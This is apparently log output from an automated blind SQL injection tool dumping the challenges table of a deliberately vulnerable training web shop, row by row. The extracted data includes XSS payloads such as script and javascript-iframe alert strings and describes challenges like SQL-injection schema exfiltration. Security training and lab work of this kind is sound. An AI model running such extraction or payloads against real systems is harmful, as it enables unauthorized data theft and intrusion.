+[12:01:22] [INFO] retrieved: ______________________________ +[12:01:22] [INFO] retrieved: +[12:01:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:01:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:01:28] [INFO] retrieving the length of query output + +[12:01:28] [INFO] retrieved: 238 +[12:01:28] [INFO] retrieved: __________________________________ +[12:01:28] [INFO] retrieved: +[12:01:53] [INFO] retrieved: ..harmful on Docker!) +[12:01:53] [INFO] retrieved: Bypass the Content Security Policy and perform an XSS attack with <script>alert(`xss`)</script> on a legacy page within the application. (This challenge is potentially harmful on Docker!) +[12:01:53] [INFO] retrieving the length of query output + +[12:01:53] [INFO] retrieved: 1 + +[12:01:53] [INFO] retrieved: 4 +[12:01:53] [INFO] retrieving the length of query output + +[12:01:53] [INFO] retrieved: 6 +[12:01:53] [INFO] retrieved: ______ +[12:01:53] [INFO] retrieved: +[12:01:54] [INFO] retrieved: Docker +[12:01:54] [INFO] retrieved: Docker +[12:01:54] [INFO] retrieving the length of query output + +[12:01:54] [INFO] retrieved: 1 + +[12:01:54] [INFO] retrieved: 0 +[12:01:54] [INFO] retrieving the length of query output + +[12:01:54] [INFO] retrieved: 2 +[12:01:54] [INFO] retrieved: __ +[12:01:54] [INFO] retrieved: +[12:01:54] [INFO] retrieved: 16 +[12:01:54] [INFO] retrieved: 16 +[12:01:55] [INFO] retrieving the length of query output + +[12:01:54] [INFO] retrieved: 20 +[12:01:55] [INFO] retrieved: ____________________ +[12:01:55] [INFO] retrieved: +[12:01:57] [INFO] retrieved: usernameXssChallenge +[12:01:57] [INFO] retrieved: usernameXssChallenge +[12:01:57] [INFO] retrieving the length of query output + +[12:01:57] [INFO] retrieved: 95 +[12:01:57] [INFO] retrieved: __________________________________ +[12:01:57] [INFO] retrieved: +[12:02:09] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html +[12:02:09] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html +[12:02:09] [INFO] retrieving the length of query output + +[12:02:09] [INFO] retrieved: 10 +[12:02:09] [INFO] retrieved: __________ +[12:02:09] [INFO] retrieved: +[12:02:11] [INFO] retrieved: CSP Bypass +[12:02:11] [INFO] retrieved: CSP Bypass +[12:02:11] [INFO] retrieving the length of query output + +[12:02:11] [INFO] retrieved: 1 + +[12:02:11] [INFO] retrieved: 0 +[12:02:11] [INFO] retrieving the length of query output + +[12:02:11] [INFO] retrieved: 11 +[12:02:11] [INFO] retrieved: ___________ +[12:02:11] [INFO] retrieved: +[12:02:12] [INFO] retrieved: Danger Zone +[12:02:12] [INFO] retrieved: Danger Zone +[12:02:12] [INFO] retrieving the length of query output + +[12:02:12] [INFO] retrieved: + +[12:02:12] [INFO] retrieved: +[12:02:12] [INFO] retrieving the length of query output + +[12:02:12] [INFO] retrieved: 30 +[12:02:13] [INFO] retrieved: ______________________________ +[12:02:13] [INFO] retrieved: +[12:02:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:02:16] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:02:16] [INFO] retrieving the length of query output + +[12:02:16] [INFO] retrieved: 3 +[12:02:17] [INFO] retrieved: ___ +[12:02:17] [INFO] retrieved: +[12:02:17] [INFO] retrieved: XSS +[12:02:17] [INFO] retrieved: XSS +[12:02:17] [INFO] retrieving the length of query output + +[12:02:17] [INFO] retrieved: 1 + +[12:02:17] [INFO] retrieved: 0 +[12:02:17] [INFO] retrieving the length of query output + +[12:02:17] [INFO] retrieved: 30 +[12:02:17] [INFO] retrieved: ______________________________ +[12:02:17] [INFO] retrieved: +[12:02:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:02:21] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:02:21] [INFO] retrieving the length of query output + +[12:02:21] [INFO] retrieved: 228 +[12:02:21] [INFO] retrieved: __________________________________ +[12:02:21] [INFO] retrieved: +[12:02:48] [INFO] retrieved: ..harmful on Docker!) +[12:02:48] [INFO] retrieved: Perform a persisted XSS attack with <iframe src="javascript:alert(`xss`)"> bypassing a client-side security mechanism. (This challenge is potentially harmful on Docker!) +[12:02:48] [INFO] retrieving the length of query output + +[12:02:48] [INFO] retrieved: 1 + +[12:02:48] [INFO] retrieved: 3 +[12:02:48] [INFO] retrieving the length of query output + +[12:02:48] [INFO] retrieved: 6 +[12:02:48] [INFO] retrieved: ______ +[12:02:48] [INFO] retrieved: +[12:02:49] [INFO] retrieved: Docker +[12:02:49] [INFO] retrieved: Docker +[12:02:49] [INFO] retrieving the length of query output + +[12:02:49] [INFO] retrieved: 1 + +[12:02:49] [INFO] retrieved: 0 +[12:02:49] [INFO] retrieving the length of query output + +[12:02:49] [INFO] retrieved: 2 +[12:02:49] [INFO] retrieved: __ +[12:02:49] [INFO] retrieved: +[12:02:49] [INFO] retrieved: 17 +[12:02:50] [INFO] retrieved: 17 +[12:02:50] [INFO] retrieving the length of query output + +[12:02:50] [INFO] retrieved: 25 +[12:02:50] [INFO] retrieved: _________________________ +[12:02:50] [INFO] retrieved: +[12:02:52] [INFO] retrieved: persistedXssUserChallenge +[12:02:52] [INFO] retrieved: persistedXssUserChallenge +[12:02:52] [INFO] retrieving the length of query output + +[12:02:52] [INFO] retrieved: 95 +[12:02:52] [INFO] retrieved: __________________________________ +[12:02:52] [INFO] retrieved: +[12:03:02] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html +[12:03:02] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html +[12:03:02] [INFO] retrieving the length of query output + +[12:03:02] [INFO] retrieved: 26 +[12:03:02] [INFO] retrieved: __________________________ +[12:03:02] [INFO] retrieved: +[12:03:05] [INFO] retrieved: Client-side XSS Protection +[12:03:05] [INFO] retrieved: Client-side XSS Protection +[12:03:05] [INFO] retrieving the length of query output + +[12:03:05] [INFO] retrieved: 1 + +[12:03:05] [INFO] retrieved: 0 +[12:03:05] [INFO] retrieving the length of query output + +[12:03:05] [INFO] retrieved: 11 +[12:03:05] [INFO] retrieved: ___________ +[12:03:05] [INFO] retrieved: +[12:03:06] [INFO] retrieved: Danger Zone +[12:03:06] [INFO] retrieved: Danger Zone +[12:03:06] [INFO] retrieving the length of query output + +[12:03:06] [INFO] retrieved: + +[12:03:06] [INFO] retrieved: +[12:03:07] [INFO] retrieving the length of query output + +[12:03:07] [INFO] retrieved: 30 +[12:03:07] [INFO] retrieved: ______________________________ +[12:03:07] [INFO] retrieved: +[12:03:10] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:10] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:10] [INFO] retrieving the length of query output + +[12:03:10] [INFO] retrieved: 23 +[12:03:10] [INFO] retrieved: _______________________ +[12:03:10] [INFO] retrieved: +[12:03:16] [INFO] retrieved: Sensitive Data Exposure +[12:03:16] [INFO] retrieved: Sensitive Data Exposure +[12:03:16] [INFO] retrieving the length of query output + +[12:03:16] [INFO] retrieved: 1 + +[12:03:17] [INFO] retrieved: 0 +[12:03:17] [INFO] retrieving the length of query output + +[12:03:17] [INFO] retrieved: 30 +[12:03:17] [INFO] retrieved: ______________________________ +[12:03:17] [INFO] retrieved: +[12:03:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:20] [INFO] retrieving the length of query output + +[12:03:20] [INFO] retrieved: 31 +[12:03:20] [INFO] retrieved: _______________________________ +[12:03:20] [INFO] retrieved: +[12:03:24] [INFO] retrieved: Access a confidential document. +[12:03:24] [INFO] retrieved: Access a confidential document. +[12:03:24] [INFO] retrieving the length of query output + +[12:03:24] [INFO] retrieved: 1 + +[12:03:24] [INFO] retrieved: 1 +[12:03:24] [INFO] retrieving the length of query output + +[12:03:24] [INFO] retrieved: + +[12:03:24] [INFO] retrieved: +[12:03:24] [INFO] retrieving the length of query output + +[12:03:24] [INFO] retrieved: 1 + +[12:03:24] [INFO] retrieved: 1 +[12:03:24] [INFO] retrieving the length of query output + +[12:03:24] [INFO] retrieved: 2 +[12:03:24] [INFO] retrieved: __ +[12:03:24] [INFO] retrieved: +[12:03:25] [INFO] retrieved: 18 +[12:03:25] [INFO] retrieved: 18 +[12:03:25] [INFO] retrieving the length of query output + +[12:03:25] [INFO] retrieved: 25 +[12:03:25] [INFO] retrieved: _________________________ +[12:03:25] [INFO] retrieved: +[12:03:27] [INFO] retrieved: directoryListingChallenge +[12:03:27] [INFO] retrieved: directoryListingChallenge +[12:03:27] [INFO] retrieving the length of query output + +[12:03:27] [INFO] retrieved: + +[12:03:27] [INFO] retrieved: +[12:03:28] [INFO] retrieving the length of query output + +[12:03:28] [INFO] retrieved: 21 +[12:03:28] [INFO] retrieved: _____________________ +[12:03:28] [INFO] retrieved: +[12:03:30] [INFO] retrieved: Confidential Document +[12:03:30] [INFO] retrieved: Confidential Document +[12:03:30] [INFO] retrieving the length of query output + +[12:03:30] [INFO] retrieved: 1 + +[12:03:30] [INFO] retrieved: 1 +[12:03:30] [INFO] retrieving the length of query output + +[12:03:30] [INFO] retrieved: 36 +[12:03:30] [INFO] retrieved: __________________________________ +[12:03:30] [INFO] retrieved: +[12:03:34] [INFO] retrieved: ..d for Demos,With Coding Challenge +[12:03:34] [INFO] retrieved: Good for Demos,With Coding Challenge +[12:03:34] [INFO] retrieving the length of query output + +[12:03:34] [INFO] retrieved: + +[12:03:34] [INFO] retrieved: +[12:03:34] [INFO] retrieving the length of query output + +[12:03:34] [INFO] retrieved: 30 +[12:03:34] [INFO] retrieved: ______________________________ +[12:03:34] [INFO] retrieved: +[12:03:38] [INFO] retrieved: 2026-05-08 08:45:15.511 +00:00 +[12:03:38] [INFO] retrieved: 2026-05-08 08:45:15.511 +00:00 +[12:03:38] [INFO] retrieving the length of query output + +[12:03:38] [INFO] retrieved: 3 +[12:03:38] [INFO] retrieved: ___ +[12:03:38] [INFO] retrieved: +[12:03:38] [INFO] retrieved: XSS +[12:03:38] [INFO] retrieved: XSS +[12:03:38] [INFO] retrieving the length of query output + +[12:03:38] [INFO] retrieved: 1 + +[12:03:38] [INFO] retrieved: 0 +[12:03:39] [INFO] retrieving the length of query output + +[12:03:39] [INFO] retrieved: 30 +[12:03:39] [INFO] retrieved: ______________________________ +[12:03:39] [INFO] retrieved: +[12:03:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:03:42] [INFO] retrieving the length of query output + +[12:03:42] [INFO] retrieved: 95 +[12:03:43] [INFO] retrieved: __________________________________ +[12:03:43] [INFO] retrieved: +[12:03:56] [INFO] retrieved: ..ascript:alert(`xss`)">. +[12:03:56] [INFO] retrieved: Perform a DOM XSS attack with <iframe src="javascript:alert(`xss`)">. +[12:03:56] [INFO] retrieving the length of query output + +[12:03:56] [INFO] retrieved: 1 + +[12:03:56] [INFO] retrieved: 1 +[12:03:56] [INFO] retrieving the length of query output + +[12:03:56] [INFO] retrieved: + +[12:03:56] [INFO] retrieved: +[12:03:57] [INFO] retrieving the length of query output + +[12:03:57] [INFO] retrieved: 1 + +[12:03:57] [INFO] retrieved: 1 +[12:03:57] [INFO] retrieving the length of query output + +[12:03:57] [INFO] retrieved: 2 +[12:03:57] [INFO] retrieved: __ +[12:03:57] [INFO] retrieved: +[12:03:57] [INFO] retrieved: 19 +[12:03:57] [INFO] retrieved: 19 +[12:03:57] [INFO] retrieving the length of query output + +[12:03:57] [INFO] retrieved: 17 +[12:03:57] [INFO] retrieved: _________________ +[12:03:57] [INFO] retrieved: +[12:03:59] [INFO] retrieved: localXssChallenge +[12:03:59] [INFO] retrieved: localXssChallenge +[12:03:59] [INFO] retrieving the length of query output + +[12:03:59] [INFO] retrieved: 88 +[12:04:00] [INFO] retrieved: __________________________________ +[12:04:00] [INFO] retrieved: +[12:04:10] [INFO] retrieved: ..d_XSS_Prevention_Cheat_Sheet.html +[12:04:10] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html +[12:04:10] [INFO] retrieving the length of query output + +[12:04:10] [INFO] retrieved: 7 +[12:04:10] [INFO] retrieved: _______ +[12:04:10] [INFO] retrieved: +[12:04:10] [INFO] retrieved: DOM XSS +[12:04:11] [INFO] retrieved: DOM XSS +[12:04:11] [INFO] retrieving the length of query output + +[12:04:11] [INFO] retrieved: 1 + +[12:04:11] [INFO] retrieved: 0 +[12:04:11] [INFO] retrieving the length of query output + +[12:04:11] [INFO] retrieved: 45 +[12:04:11] [INFO] retrieved: __________________________________ +[12:04:11] [INFO] retrieved: +[12:04:17] [INFO] retrieved: ..d for Demos,With Coding Challenge +[12:04:17] [INFO] retrieved: Tutorial,Good for Demos,With Coding Challenge +[12:04:17] [INFO] retrieving the length of query output + +[12:04:17] [INFO] retrieved: 1 + +[12:04:17] [INFO] retrieved: 2 +[12:04:17] [INFO] retrieving the length of query output + +[12:04:17] [INFO] retrieved: 30 +[12:04:17] [INFO] retrieved: ______________________________ +[12:04:17] [INFO] retrieved: +[12:04:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:20] [INFO] retrieving the length of query output + +[12:04:20] [INFO] retrieved: 9 +[12:04:21] [INFO] retrieved: _________ +[12:04:21] [INFO] retrieved: +[12:04:22] [INFO] retrieved: Injection +[12:04:24] [INFO] retrieved: Injection +[12:04:24] [INFO] retrieving the length of query output + +[12:04:24] [INFO] retrieved: 1 + +[12:04:25] [INFO] retrieved: 0 +[12:04:25] [INFO] retrieving the length of query output + +[12:04:25] [INFO] retrieved: 30 +[12:04:25] [INFO] retrieved: ______________________________ +[12:04:25] [INFO] retrieved: +[12:04:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:28] [INFO] retrieving the length of query output + +[12:04:28] [INFO] retrieved: 61 +[12:04:29] [INFO] retrieved: __________________________________ +[12:04:29] [INFO] retrieved: +[12:04:35] [INFO] retrieved: ..ema definition via SQL Injection. +[12:04:35] [INFO] retrieved: Exfiltrate the entire DB schema definition via SQL Injection. +[12:04:35] [INFO] retrieving the length of query output + +[12:04:35] [INFO] retrieved: 1 + +[12:04:35] [INFO] retrieved: 3 +[12:04:35] [INFO] retrieving the length of query output + +[12:04:35] [INFO] retrieved: + +[12:04:35] [INFO] retrieved: +[12:04:36] [INFO] retrieving the length of query output + +[12:04:36] [INFO] retrieved: 1 + +[12:04:36] [INFO] retrieved: 1 +[12:04:36] [INFO] retrieving the length of query output + +[12:04:36] [INFO] retrieved: 2 +[12:04:36] [INFO] retrieved: __ +[12:04:36] [INFO] retrieved: +[12:04:36] [INFO] retrieved: 20 +[12:04:36] [INFO] retrieved: 20 +[12:04:36] [INFO] retrieving the length of query output + +[12:04:36] [INFO] retrieved: 17 +[12:04:36] [INFO] retrieved: _________________ +[12:04:36] [INFO] retrieved: +[12:04:38] [INFO] retrieved: dbSchemaChallenge +[12:04:38] [INFO] retrieved: dbSchemaChallenge +[12:04:38] [INFO] retrieving the length of query output + +[12:04:38] [INFO] retrieved: 88 +[12:04:38] [INFO] retrieved: __________________________________ +[12:04:38] [INFO] retrieved: +[12:04:47] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html +[12:04:48] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html +[12:04:48] [INFO] retrieving the length of query output + +[12:04:48] [INFO] retrieved: 15 +[12:04:48] [INFO] retrieved: _______________ +[12:04:48] [INFO] retrieved: +[12:04:49] [INFO] retrieved: Database Schema +[12:04:49] [INFO] retrieved: Database Schema +[12:04:49] [INFO] retrieving the length of query output + +[12:04:49] [INFO] retrieved: 1 + +[12:04:49] [INFO] retrieved: 0 +[12:04:50] [INFO] retrieving the length of query output + +[12:04:50] [INFO] retrieved: 21 +[12:04:50] [INFO] retrieved: _____________________ +[12:04:50] [INFO] retrieved: +[12:04:52] [INFO] retrieved: With Coding Challenge +[12:04:52] [INFO] retrieved: With Coding Challenge +[12:04:52] [INFO] retrieving the length of query output + +[12:04:52] [INFO] retrieved: + +[12:04:52] [INFO] retrieved: +[12:04:52] [INFO] retrieving the length of query output + +[12:04:52] [INFO] retrieved: 30 +[12:04:52] [INFO] retrieved: ______________________________ +[12:04:52] [INFO] retrieved: +[12:04:56] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:56] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00 +[12:04:56] [INFO] retrieving the length of query output + +[12:04:56] [INFO] retrieved: 25 +[12:04:56] [INFO] retrieved: _________________________ +[12:04:56] [INFO] retrieved: +[12:05:02] [INFO] retrieved: Security Misconfiguration +[12:05:02] [INFO] retrieved: Security Misconfiguration +[12:05:02] [INFO] retrieving the length of query output + +[12:05:02] [INFO] retrieved: 1 + +[12:05:02] [INFO] retrieved: 0 +[12:05:02] [INFO] retrieving the length of query output + +[12:05:02] [INFO] retrieved: 30 +[12:05:02] [INFO] retrieved: ______________________________ +[12:05:02] [INFO] retrieved: +[12:05:06] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:06] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:06] [INFO] retrieving the length of query output + +[12:05:06] [INFO] retrieved: 63 +[12:05:06] [INFO] retrieved: __________________________________ +[12:05:06] [INFO] retrieved: +[12:05:12] [INFO] retrieved: .. that was not properly shut down. +[12:05:12] [INFO] retrieved: Use a deprecated B2B interface that was not properly shut down. +[12:05:12] [INFO] retrieving the length of query output + +[12:05:12] [INFO] retrieved: 1 + +[12:05:12] [INFO] retrieved: 2 +[12:05:13] [INFO] retrieving the length of query output + +[12:05:13] [INFO] retrieved: + +[12:05:13] [INFO] retrieved: +[12:05:13] [INFO] retrieving the length of query output + +[12:05:13] [INFO] retrieved: 1 + +[12:05:13] [INFO] retrieved: 0 +[12:05:13] [INFO] retrieving the length of query output + +[12:05:13] [INFO] retrieved: 2 +[12:05:13] [INFO] retrieved: __ +[12:05:13] [INFO] retrieved: +[12:05:14] [INFO] retrieved: 21 +[12:05:14] [INFO] retrieved: 21 +[12:05:14] [INFO] retrieving the length of query output + +[12:05:14] [INFO] retrieved: 28 +[12:05:14] [INFO] retrieved: ____________________________ +[12:05:14] [INFO] retrieved: +[12:05:17] [INFO] retrieved: deprecatedInterfaceChallenge +[12:05:17] [INFO] retrieved: deprecatedInterfaceChallenge +[12:05:17] [INFO] retrieving the length of query output + +[12:05:17] [INFO] retrieved: 84 +[12:05:17] [INFO] retrieved: __________________________________ +[12:05:17] [INFO] retrieved: +[12:05:26] [INFO] retrieved: ..Service_Security_Cheat_Sheet.html +[12:05:26] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html +[12:05:26] [INFO] retrieving the length of query output + +[12:05:26] [INFO] retrieved: 20 +[12:05:26] [INFO] retrieved: ____________________ +[12:05:26] [INFO] retrieved: +[12:05:28] [INFO] retrieved: Deprecated Interface +[12:05:28] [INFO] retrieved: Deprecated Interface +[12:05:28] [INFO] retrieving the length of query output + +[12:05:28] [INFO] retrieved: 1 + +[12:05:28] [INFO] retrieved: 0 +[12:05:28] [INFO] retrieving the length of query output + +[12:05:28] [INFO] retrieved: 24 +[12:05:28] [INFO] retrieved: ________________________ +[12:05:28] [INFO] retrieved: +[12:05:31] [INFO] retrieved: Contraption,Prerequisite +[12:05:31] [INFO] retrieved: Contraption,Prerequisite +[12:05:31] [INFO] retrieving the length of query output + +[12:05:31] [INFO] retrieved: + +[12:05:31] [INFO] retrieved: +[12:05:31] [INFO] retrieving the length of query output + +[12:05:31] [INFO] retrieved: 30 +[12:05:31] [INFO] retrieved: ______________________________ +[12:05:31] [INFO] retrieved: +[12:05:37] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:37] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:37] [INFO] retrieving the length of query output + +[12:05:37] [INFO] retrieved: 21 +[12:05:37] [INFO] retrieved: _____________________ +[12:05:37] [INFO] retrieved: +[12:05:40] [INFO] retrieved: Broken Access Control +[12:05:40] [INFO] retrieved: Broken Access Control +[12:05:40] [INFO] retrieving the length of query output + +[12:05:40] [INFO] retrieved: 1 + +[12:05:40] [INFO] retrieved: 0 +[12:05:40] [INFO] retrieving the length of query output + +[12:05:40] [INFO] retrieved: 30 +[12:05:40] [INFO] retrieved: ______________________________ +[12:05:40] [INFO] retrieved: +[12:05:43] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:43] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:05:43] [INFO] retrieving the length of query output + +[12:05:43] [INFO] retrieved: 106 +[12:05:44] [INFO] retrieved: __________________________________ +[12:05:44] [INFO] retrieved: +[12:05:55] [INFO] retrieved: .." target="_blank">easter egg. +[12:05:55] [INFO] retrieved: Find the hidden easter egg. +[12:05:55] [INFO] retrieving the length of query output + +[12:05:55] [INFO] retrieved: 1 + +[12:05:55] [INFO] retrieved: 4 +[12:05:55] [INFO] retrieving the length of query output + +[12:05:55] [INFO] retrieved: + +[12:05:55] [INFO] retrieved: +[12:05:55] [INFO] retrieving the length of query output + +[12:05:55] [INFO] retrieved: 1 + +[12:05:56] [INFO] retrieved: 0 +[12:05:56] [INFO] retrieving the length of query output + +[12:05:56] [INFO] retrieved: 2 +[12:05:56] [INFO] retrieved: __ +[12:05:56] [INFO] retrieved: +[12:05:56] [INFO] retrieved: 22 +[12:05:56] [INFO] retrieved: 22 +[12:05:56] [INFO] retrieving the length of query output + +[12:05:56] [INFO] retrieved: 26 +[12:05:56] [INFO] retrieved: __________________________ +[12:05:56] [INFO] retrieved: +[12:05:59] [INFO] retrieved: easterEggLevelOneChallenge +[12:05:59] [INFO] retrieved: easterEggLevelOneChallenge +[12:05:59] [INFO] retrieving the length of query output + +[12:05:59] [INFO] retrieved: + +[12:05:59] [INFO] retrieved: +[12:05:59] [INFO] retrieving the length of query output + +[12:05:59] [INFO] retrieved: 10 +[12:06:00] [INFO] retrieved: __________ +[12:06:00] [INFO] retrieved: +[12:06:01] [INFO] retrieved: Easter Egg +[12:06:01] [INFO] retrieved: Easter Egg +[12:06:01] [INFO] retrieving the length of query output + +[12:06:01] [INFO] retrieved: 1 + +[12:06:01] [INFO] retrieved: 0 +[12:06:01] [INFO] retrieving the length of query output + +[12:06:01] [INFO] retrieved: 38 +[12:06:01] [INFO] retrieved: __________________________________ +[12:06:01] [INFO] retrieved: +[12:06:05] [INFO] retrieved: ..nigans,Contraption,Good for Demos +[12:06:05] [INFO] retrieved: Shenanigans,Contraption,Good for Demos +[12:06:05] [INFO] retrieving the length of query output + +[12:06:05] [INFO] retrieved: + +[12:06:05] [INFO] retrieved: +[12:06:05] [INFO] retrieving the length of query output + +[12:06:05] [INFO] retrieved: 30 +[12:06:05] [INFO] retrieved: ______________________________ +[12:06:05] [INFO] retrieved: +[12:06:09] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:09] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:09] [INFO] retrieving the length of query output + +[12:06:09] [INFO] retrieved: 23 +[12:06:09] [INFO] retrieved: _______________________ +[12:06:09] [INFO] retrieved: +[12:06:12] [INFO] retrieved: Sensitive Data Exposure +[12:06:12] [INFO] retrieved: Sensitive Data Exposure +[12:06:12] [INFO] retrieving the length of query output + +[12:06:12] [INFO] retrieved: 1 + +[12:06:12] [INFO] retrieved: 0 +[12:06:12] [INFO] retrieving the length of query output + +[12:06:12] [INFO] retrieved: 30 +[12:06:12] [INFO] retrieved: ______________________________ +[12:06:12] [INFO] retrieved: +[12:06:16] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:16] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:16] [INFO] retrieving the length of query output + +[12:06:16] [INFO] retrieved: 74 +[12:06:16] [INFO] retrieved: __________________________________ +[12:06:16] [INFO] retrieved: +[12:06:23] [INFO] retrieved: ..e by accessing data cross-domain. +[12:06:23] [INFO] retrieved: Perform an unwanted information disclosure by accessing data cross-domain. +[12:06:23] [INFO] retrieving the length of query output + +[12:06:23] [INFO] retrieved: 1 + +[12:06:23] [INFO] retrieved: 5 +[12:06:28] [INFO] retrieving the length of query output + +[12:06:28] [INFO] retrieved: + +[12:06:28] [INFO] retrieved: +[12:06:28] [INFO] retrieving the length of query output + +[12:06:28] [INFO] retrieved: 1 + +[12:06:28] [INFO] retrieved: 0 +[12:06:28] [INFO] retrieving the length of query output + +[12:06:28] [INFO] retrieved: 2 +[12:06:29] [INFO] retrieved: __ +[12:06:29] [INFO] retrieved: +[12:06:29] [INFO] retrieved: 23 +[12:06:29] [INFO] retrieved: 23 +[12:06:29] [INFO] retrieving the length of query output + +[12:06:29] [INFO] retrieved: 18 +[12:06:29] [INFO] retrieved: __________________ +[12:06:29] [INFO] retrieved: +[12:06:31] [INFO] retrieved: emailLeakChallenge +[12:06:31] [INFO] retrieved: emailLeakChallenge +[12:06:31] [INFO] retrieving the length of query output + +[12:06:31] [INFO] retrieved: 72 +[12:06:31] [INFO] retrieved: __________________________________ +[12:06:31] [INFO] retrieved: +[12:06:38] [INFO] retrieved: ..tsheets/XS_Leaks_Cheat_Sheet.html +[12:06:39] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/XS_Leaks_Cheat_Sheet.html +[12:06:39] [INFO] retrieving the length of query output + +[12:06:39] [INFO] retrieved: 10 +[12:06:39] [INFO] retrieved: __________ +[12:06:39] [INFO] retrieved: +[12:06:40] [INFO] retrieved: Email Leak +[12:06:40] [INFO] retrieved: Email Leak +[12:06:40] [INFO] retrieving the length of query output + +[12:06:40] [INFO] retrieved: 1 + +[12:06:40] [INFO] retrieved: 0 +[12:06:40] [INFO] retrieving the length of query output + +[12:06:40] [INFO] retrieved: + +[12:06:40] [INFO] retrieved: +[12:06:40] [INFO] retrieving the length of query output + +[12:06:40] [INFO] retrieved: + +[12:06:40] [INFO] retrieved: +[12:06:40] [INFO] retrieving the length of query output + +[12:06:40] [INFO] retrieved: 30 +[12:06:41] [INFO] retrieved: ______________________________ +[12:06:41] [INFO] retrieved: +[12:06:44] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:44] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:44] [INFO] retrieving the length of query output + +[12:06:44] [INFO] retrieved: 25 +[12:06:44] [INFO] retrieved: _________________________ +[12:06:44] [INFO] retrieved: +[12:06:47] [INFO] retrieved: Improper Input Validation +[12:06:47] [INFO] retrieved: Improper Input Validation +[12:06:47] [INFO] retrieving the length of query output + +[12:06:47] [INFO] retrieved: 1 + +[12:06:47] [INFO] retrieved: 0 +[12:06:47] [INFO] retrieving the length of query output + +[12:06:47] [INFO] retrieved: 30 +[12:06:48] [INFO] retrieved: ______________________________ +[12:06:48] [INFO] retrieved: +[12:06:51] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:51] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00 +[12:06:51] [INFO] retrieving the length of query output + +[12:06:51] [INFO] retrieved: 49 +[12:06:51] [INFO] retrieved: __________________________________ +[12:06:51] [INFO] retrieved: +[12:06:56] [INFO] retrieved: ..with an empty email and password. +[12:06:56] [INFO] retrieved: Register a user with an empty email and password. +[12:06:56] [INFO] retrieving the length of query output + +[12:06:56] [INFO] retrieved: 1 + +[12:06:56] [INFO] retrieved: 2 +[12:06:56] [INFO] retrieving the length of query output + +[12:06:56] [INFO] retrieved: + +[12:06:56] [INFO] retrieved: +[12:06:57] [INFO] retrieving the length of query output + +[12:06:57] [INFO] retrieved: 1 + +[12:06:57] [INFO] retrieved: 0 +[12:06:57] [INFO] retrieving the length of query output + +[12:06:57] [INFO] retrieved: 2 +[12:06:57] [INFO] retrieved: __ +[12:06:57] [INFO] retrieved: +[12:06:57] [INFO] retrieved: 24 +[12:06:57] [INFO] retrieved: 24 +[12:06:57] [INFO] retrieving the length of query output + +[12:06:57] [INFO] retrieved: 21 +[12:06:57] [INFO] retrieved: _____________________ +[12:06:57] [INFO] retrieved: +[12:07:00] [INFO] retrieved: emptyUserRegistration +[12:07:00] [INFO] retrieved: emptyUserRegistration +[12:07:00] [INFO] retrieving the length of query output + +[12:07:00] [INFO] retrieved: 80 +[12:07:00] [INFO] retrieved: __________________________________ +[12:07:00] [INFO] retrieved: +[12:07:11] [INFO] retrieved: ..Input_Validation_Cheat_Sheet.html +[12:07:11] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html +[12:07:11] [INFO] retrieving the length of query output + +[12:07:11] [INFO] retrieved: 23 +[12:07:11] [INFO] retrieved: _______________________ +[12:07:11] [INFO] retrieved: +[12:07:14] [INFO] retrieved: Empty User Registration +[12:07:14] [INFO] retrieved: Empty User Registration +[12:07:14] [INFO] retrieving the length of query output + +[12:07:14] [INFO] retrieved: 1 + +[12:07:14] [INFO] retrieved: 0 +[12:07:14] [INFO] retrieving the length of query output + +[12:07:14] [INFO] retrieved: + +[12:07:14] [INFO] retrieved: +[12:07:14] [INFO] retrieving the length of query output + +[12:07:14] [INFO] retrieved: + +[12:07:14] [INFO] retrieved: +[12:07:14] [INFO] 